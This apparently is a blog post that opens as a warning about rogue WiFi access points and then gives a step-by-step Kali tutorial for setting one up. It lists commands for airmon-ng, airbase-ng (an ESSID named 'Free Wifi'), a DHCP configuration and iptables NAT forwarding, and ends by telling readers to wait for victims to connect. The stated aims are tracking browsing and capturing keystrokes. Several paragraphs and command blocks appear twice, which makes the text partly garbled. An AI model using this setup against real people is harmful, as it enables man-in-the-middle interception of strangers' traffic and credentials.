Got free WiFi in the airport? At college? In
motels? Or anywhere else?… Before connecting, we must make sure the access
points are really broadcasted by
companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with airport/college/motels). Someone might have created a fake AP, so they can track our browsing history, and capture our key strokes (for a MITM and a lot more). BEWARE ! ! ! This all is about ROGUE Wireless Access Points.
companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with airport/college/motels). Someone might have created a fake AP, so they can track our browsing history, and capture our key strokes (for a MITM and a lot more). BEWARE ! ! ! This all is about ROGUE Wireless Access Points.
Tools required:
apt-get: to get new dhcp
software
airmon-ng
airbase-ng: turns our kali to AP
dhcpd3: for adding dhcp server
functionality.
The fake AP process goes like this:
1) Someone connects to fake AP, that we created
2) With DHCP, we provide dynamically changing IP address to them.
3) Similarly, we provide a default gateway, DNS.
2) With DHCP, we provide dynamically changing IP address to them.
3) Similarly, we provide a default gateway, DNS.
Let’s begin….
Run:
apt-get update
apt-get upgrade
Let it finish, then run:
apt-get install dhcp3-server -y
(-y is simply yes for any prompts)
(Now, for safety. . .we move the default dhcp
conf file to backup, so that we can access it next time if needed)
Run:
mv /etc/dhcp3/dhcpd.conf
/etc/dhcp3/dhcpd.conf.backup
(in case of wrong location above, search in
Google for the location)
We’re with an empty conf file. We must assign new
things here, such as gateway, DNS…for the purpose of hand out to the user who
connects to this fake AP.
Let’s assume we did as follows in our
logical interface:
Network : 192.168.2.0/24
DNS : 8.8.8.8
Gateway : 192.168.2.1
These will create our specified wireless routing
network.
Let’s assume our n/w is at 192.168.1.0/24
When user connects to the fake AP and wants to
surf internet, he goes first from the specified content and then gets routed to
original destination via our n/w at: 192.168.1.0/24
Let’s work in work in our text editor.
You can choose your best one. I’ll use nano:
Run:
nano /etc/dhcp3/dhcpd.conf
You’ll get blank text editor of dhcpd.conf.
Now, write following exactly:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
CTRL+X
Y
ENTER
Y
ENTER
Run:
airmon-ng start wlan0
airodump-ng mon0
Let’s create new ESSID “Free WiFi”:
Run:
airbase-ng –essid “Free Wifi” -c 6 mon0
(The Channel is 6, as seen after airodump-ng
mon0, but it may differ on your case.)
Open new tab, or clone the session. Run:
ifconfig at0 up
Next, lets assign the IP to at0. Run:
ifconfig at0 192.168.2.1/24
Let’s route the Kali machine with our assigned
GW. Run:
route add-net 192.168.2.0 netmask 255.255.255.0
gw 192.168.2.1
Start DHCP server service. Run:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf
/var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
Run:
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface eth0 -j
MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface eth0 -j
MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Finally, wait and watch in the previous tab to
see if someone’s associated with Free WiFi or not. Enjoy!
No comments:
Post a Comment